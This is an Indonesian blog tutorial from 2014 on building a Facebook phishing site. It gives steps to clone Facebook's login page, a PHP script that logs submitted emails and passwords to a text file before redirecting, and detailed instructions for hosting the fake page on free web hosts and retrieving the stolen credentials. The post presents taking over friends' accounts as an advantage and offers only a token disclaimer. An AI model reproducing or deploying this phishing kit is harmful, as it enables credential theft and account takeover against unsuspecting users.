Monday 15 December 2014

Cara Hack Facebook Dengan Mudah Tanpa Software

بِسْــــــــــــــــمِ اﷲِالرَّحْمَنِ اارَّحِيم
Cara Hack Akun Facebook Menggunkanan Trik Phising - Sudah tidak asing lagi dengan yang nama nya Hacking. Yups, Sekarang dunia Hacking sudah menyebar luas hampir ke seluruh belahan dunia. Di Indonesia sendiri teknik hacking sudah seperti hal yang biasa. Banyak anak – anak remaja Indonesia khususnya yang masih duduk di bangku sekolah sangat mahir dengan bahasa pemograman seperti PHP, HTML, Endcoe, Decode dan lain – lain.

Banyak anak – anak Indonesia yang bergabung dengan tim seperti Cyber, Black Hat, White Hat dan lain – lain. Bagi yang sering on di facebook pasti anda sering menjumpai grup – grup facebook seperti Cyber, Black Hat, Anonymous, Hackers dll. Sebener nya teknik Hacking masih ada banyak bukan hanya teknik Phising aja. Ada juga teknik Hacking yang menggunakan trik seperti: Joomla, Havij, Greenox, Google Dork, SQL Injection dan masih banyak lagi.

Apa Itu Phising ? Phising adalah Sebuah website atau situs yang tampilan nya 100% mirip dengan situs asli nya, Phising adalah teknik menipu akun seseorang untuk mendapatkan email dan sandi akun facebook seseorang. Yups, Dengan tampilan nya yang 100% sangat mirip dengan website asli nya, Trik ini mampu menipu seseorang untuk mendapatkan email dan kata sandi dari akun yang di incar nya. Memank teknik ini sangatlah menyebalkan, Karena banyak orang yang mudah tertipu dengan teknik ini di karenakan tampilan nya yang 100% mirip dengan Website asli nya. Jika anda sudah berhasil membuat Situs Phising, Anda bisa membaca artikel tentang Cara Membuat Robot Auto Update Status Versi Al-Quran Sharer With Translate atau anda bisa Request Tutorial.

Langkah-Langkah Cara Membuat Phising:

  • Anda harus log out dulu dari akun Facebook yang anda miliki.
  • Jika anda sudah log out, Silahkan masuk ke Facebook atau visit halaman www.facebook.com
  • Tekan “CTRL+U” untuk melihat kode – kode dari situs Facebook atau anda bias klik kanan kemudian pilih View Page Source.
  • Silahkan anda “Copy” Semua kode nya. Supaya lebih cepat, Tekan “CTRL+A” (Untuk Memblok Semua Kode nya) Kemudian Tekan CTRL+C (Untuk Mengcopy Semua Kode nya).
    Jika semua kode nya sudah di “Copy”, Silahkan anda buka “Notepad” di PC/Laptop yang anda gunakan. Jika belum punya “Notepad”, Silahkan anda bisa download di link ini. Download Notepad.
  • Pastekan kode nya di “Notepad” yang telah anda buka. 
  • Cari tulisan(Gunakan “CTRL+F” Supaya Lebih Cepat) action=" hapus yang ada di tulisan action, ganti dengan nama login.php Contoh: action=”login.php”
  • Kemudian, Cari tulisan (Gunakan “CTRL+F”) method="post" Ganti tulisan post dengan nama get. Contoh: method=”get”
  • Jika sudah, Silahkan anda klik File (Posisi Ada Di Atas Sebelah Kiri) kemudian pilih “Save As”. Simpan dengan nama Index.html 
  • Copy Semua kode yang ada di bawah ini, Kemudian pastekan di Notepad lalu “Save AS”. Simpan dengan nama login.php ganti Save As Type dengan “All Files”. Lihat Gambar yang ada di atas.
<?php
header("Location: http://www.facebook.com");
$handle = fopen("maling.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
  • Jika sudah di simpan, Buka notepad anda kembali. Jangan di isi, Biarkan “Notepad” kosong.
  • Jika “Notepad” sudah kosong, Silahkan anda save dengan nama maling.txt 
  • Jika Semua nya sudah di simpan, Silahkan anda masukan ke 3 Scriptnya di Hosting Gratisan seperti Idhostinger, 000Webhost dan lain – lain. Jika anda masih kebingungan cara memasukan script nya di hostingan, Silahkan anda baca yang ada di bawah ini.

Cara Memasukan Script atau File Phising Di Idhostinger.com:

  1. Silahkan anda masuk ke Idhostinger.com
  2. Loginlah di akun Idhostinger yang anda punya, Jika belum punya akun Idhostinger dan bagi anda yang belum mengetahui cara membuat nya. Silahkan anda membaca di artikel ini. Cara Membuat Akun Di Idhostinger.com
  3. Kita anggap anda sudah login di akun Idhostinger.
  4. Buatlah Hosting di Idhostinger.
  5. Cara Membuat Hosting di Idhostinger. Klik Hosting (Posisi Ada Di Atas Sebelah Kiri) Kemudian anda pilih “Order Hosting Baru” , Klik “Order Hosting Baru
  6. Masukan nama yang akan di jadikan nama link phising anda, Kemudian anda pilih nama subdomain nya. Contoh: Ipeenk-Likers.hol.es Maka link phising anda adalah http://Ipeenk-Likers.hol.es
  7. Masukan Password yang mudah di ingat untuk masuk di File Manager Idhostinger.
  8. Masukan Captcha yang ada di gambar, Kemudian “Centang” Saya setuju…….atau I Agree…….
  9. Jika Hosting sudah terbuat, Silahkan anda Klik Hosting (Posisi Ada Di Atas Sebelah Kiri) Kemudian pilih nama Hosting yang sudah anda buat.
  10. Silahkan anda Scroll Mouse ke bawah dan carilah tulisan “File Manager 2”.
  11. Jika sudah masuk di File Manager Hostingan anda, Silahkan anda klik Publik_Html.
  12. Kemudian Klik “Upload” yang posisi nya ada di atas sebelah kiri.
  13. Klik Browse, Kemudian anda pilih file phising yang telah anda buat, kemudian anda masukan semua Script atau File Phising yang telah anda buat.
  14. Jika File nya sudah anda masukan, Silahkan Klik “Centang” yang berwarna hijau (Posis Di Atas Tepat Di Samping nya Panah Yang Berwarna Biru).
  15. Klik “Centang” lagi.
  16. Jika sudah klik “Centang “ sampai 2x, Silahkan anda klik “Panah Berwarna Biru” untuk mengecek apakah File atau Script phisingnya sudah berhasil anda upload di File Manager Hosting anda. Silahkan anda klik “Panah” berwarna biru.
  17. Jika File atau Script nya sudah berhasil anda Upload, Silahkan anda cek Situs Phising anda dengan cara mengcopy Link Hosting yang telah anda buat. Jika anda bingung silahkan anda baca lagi yang ada di Nomor 6.
  18. Silahkan masukan Email atau Kata Sandi untuk mengetes apakah Situs Phisingnya berhasil atau tidak. Masukan Asal – Asalan aja, Inikan Cuma untuk percobaan.
  19. Jika anda sudah masukan Email atau Password abal abalan, Silahkan Cek hasilnya di link ini. http://nama-link-phising –anda.hol.es/maling.txt Contoh: http://ipeenk-Likers.hol.es/maling.txt
  20. Lihatlah, Jika Email dan Kata Sandi nya sudah masuk di Situs Phising anda, Berarti anda sudah berhasil Membuat Phising Facebook.

Cara Memasukan Script atau File Phising Di 000Webhost.com:

  1. Silahkan anda masuk ke 000Webhost.com 
  2. Masuklah di akun 000Webhost. Scroll Mouse ke bawah dan cari “Member Area” (Posisi Ada Di Sebelah Kanan). Jika anda belum mempunyai akun di 000webhost.com, Silahkan anda buat dulu akun 000webhost. Jika anda masih kebingungan tentang cara membuat akun di 000webhost.com, Silahkan anda baca dulu yang ada di artikel ini. Cara Membuat Hosting Gratis Di 000Webhost.com.
  3. Jika anda sudah login di 000webhost.com, Silahkan buat Hosting di 000webhost.com
  4. Klik “Create New
  5. Anda kosongkan Kolom Pertama.
  6. Di Kolom Kedua, Silahkan anda masukan Nama Link untuk Alamat Situs Phising anda. Contoh: Ipeenk-404 Kemudian anda lihat di sebelah kanan yang ada di kolom kedua, Itulah nama Subdomain Situs Phising anda. Jika nama Subdomainnya “.Comoj.comMaka alamat situs phising anda adalah http://Nama-Link-Phising.Comoj.com Contoh: http://Ipeenk-404.Comoj.com (Supaya Lebih Jelas, Lihat Di Bagian Belakang URL yang berwarna Merah. Di situlah perbedaannya. Semoga anda paham apa yang saya maksudkan)
  7. Di Kolom Ke Tiga, Silahkan anda masukan Password atau Kata Sandi yang mudah di ingat.
  8. Klik “Create”
  9. Silahkan anda Klik “Back To Account List
  10. Tunggulah 1 Menit, Jika sudah 1 Menit. Kemudian anda tekan “F5” atau “CTRL+R” yang berfungsi untuk “Refresh Halaman”.
  11. Jika Hosting sudah terbuat, Silahkan anda klik “Go To Cpanel”.
  12. Scroll ke bawah kemudian anda cari “File Manager”. Klik File Manager
  13. Jika anda di suruh masukan Password atau Kata Sandi, Silahkan anda masukan Password atau Kata Sandi dari Akun Hosting yang baru anda buat, Supaya lebih jelas. Baca nomor 6 dan 7.
  14. Jika anda sudah masuk Di File Manager akun Hosting anda, Silahkan anda klik Folder “Publik_HTML”.
  15. Klik “Upload” (Posisi Ada Di Tengah).
  16. Klik “File” Kemudian anda pilih File atau Script Phising yang telah anda buat.
  17. Klik “Centang” yang berwarna Hijau.
  18. Klik “Centang” lagi.
  19. Jika anda sudah klik Centang 2x, Silahkan anda klik Panah yang berwarna biru untuk melihat apakah File atau Script Phisingnya sudah berhasil di Upload.
  20. Jika File sudah berhasil di Upload. Silahkan anda masuk ke Link Phising anda. Jika anda masih kebingungan, Silahkan anda baca lagi yang ada di Nomor 6.
  21. Jika anda sudah masuk di Situs Phising anda, Anda masukan Email dan Kata Sandi. Masukan Sembarang atau asal – asalan aja. Inikan hanya untuk percobaan.
  22. Jika anda sudah masukan Email dan Kata Sandi yang abal – abalan. Silahkan anda masuk ke Situs Penyimpanan Email dan Kata Sandi anda. Jika anda masih kebingungan, Silahkan anda Copy alamat URL ini http://nama-link-phising-anda/maling.txt Contoh http://ipeenk-404.comoj.com/maling.txt Ganti tulisan Nama-Link-Phising-anda dengan Alamat Situs Phising anda. Kemudian pastekan di “Addres Bar”.
  23. Lihatlah, Jika Email dan Kata Sandi yang telah anda masukan sudah berhasil di simpan, Berarti anda telah berhasil Membuat Situs Phising Facebook.

Kelebihan Dari Situs Phising:

  • Anda bisa menambil Akun Facebook teman anda. 
  • Anda akan lebih mudah untuk Belajar Bahasa Pemrogaman.
  • Anda bisa berbagi Ilmu Tentang Trik Hacking ini dengan cara menyebarluaskan artikel  atau Alamat Situs Blog The Ipeenk Creations. 
  • Menambah Pengetehuan anda tentang dunia Hacking, Hacker, Anonymous, Dan Phising.
  • Anda bisa mempromosikan seperti: Barang Dagangan, Situs Yang Anda Punya, Fanspage dan lain lain dengan memanfaatkan Akun Facebook seseorang

Kekurangan Dari Situs Phising:

  • Anda akan di benci atau musuhi oleh teman anda, Jika anda Menyalahgunakan Trik Ini.
  • Jika ada teman anda yang Kehilangan Akun Facebooknya, Maka anda lah yang akan di tuduh Mencuri Akun Facebooknya meskipun itu anda tidak mengambil Akun Facebooknya. Saya pernah mengalami nya. Jadi saran saya, Jangan sampai temen – temen anda tau bahwa anda bisa hack atau mencuri Akun Facebook. Tapi anda bisa mengajarkannya kepada teman – teman anda, Jika anda ingin membantu teman anda.

Saran Dari Saya Jika Anda Sudah Berhasil Membuat Phising Facebook:

  • Jangan Salah Gunakan Trik Ini. Jika anda menyalahgunakan trik ini, Saya tidak akan bertanggung jawab jika ada masalaah, karena saya tidak mengajarkan untuk menjadi orang jahat. Saya hanya Ingin Berbagi Ilmu dan Pengetahuan yang saya ketahui. Semoga anda mengerti apa yang saya maksud.
  • Janganlah “Sombong”. Contoh: “Anda telah berhasil mengambil “Email dan Kata Sandi” dari akun facebook teman anda. Kemudian ana Update Status di Jejaring Social Facebook seperti “Saya Berhasil Menghack atau Mencuri Akun Dari Temen Saya Yang Bernama IR**n. I’m Anonymous, I’m Hackers.”  Ingat baik – baik, Jika anda ingin menjadi hacker, Janganlah “Sombong” karena Hacker bukanlah orang yang Sombong melainkan orang yang mau Berbagi Ilmu dan Pengetahuan dan Hacker adalah orang yang “Kreatif”. Ingat, Hacker itu “Di Akui” Bukan “Mengakui” Diri nya sebagai Hacker. Jika anda menyombongkan diri, Maka anda akan di benci teman – teman anda dan anda akan di “Bully” sama master yang sebenar nya.
  • Jangan memperjualkan - belikan Script atau Situs Phising yang berhasil anda buat. Berbagi Itu Indah Kawan, Hacker Sejati adalah Orang yang suka berbagi dengan teman – teman nya. Karena Hacker Sejati bukanlah orang yang sombong melainkan Hacker Sejati adalah Orang yang “Kreatif” dan mau berbagi dengan teman – teman nya. Anda juga mendapatkan ilmu ini secara gratiskan, Jadi saran saya jangan memperjual belikan Script atau Situs Phising.
  • Jangan “Bully” atau “Menghina” teman anda yang tidak tau Cara Membuat Phising, Tapi ajarinlah teman anda tentang Cara Membuat Phising. Jika anda mengajari teman anda, Maka akan ada seseorang yang mengasih Ilmu atau Pengetahuan yang belum anda ketahui. Trust Me.
     
Jika anda masih kebingungan tentang Cara Membuat Phising Facebook, Anda bisa bertanya di Kolom Komentar yang ada di bawah artikel ini. Semoga artikel ini bermanfaat bagi anda, Jika ada tutur kata yang kurang berkenan di hati anda. Saya sebagai pemilik situs Blog The Ipeenk Creations mengucapkan Terima kasih anda telah mengunjungi situs blog saya dan membaca artikel tentang Cara Membuat Phising Facebook.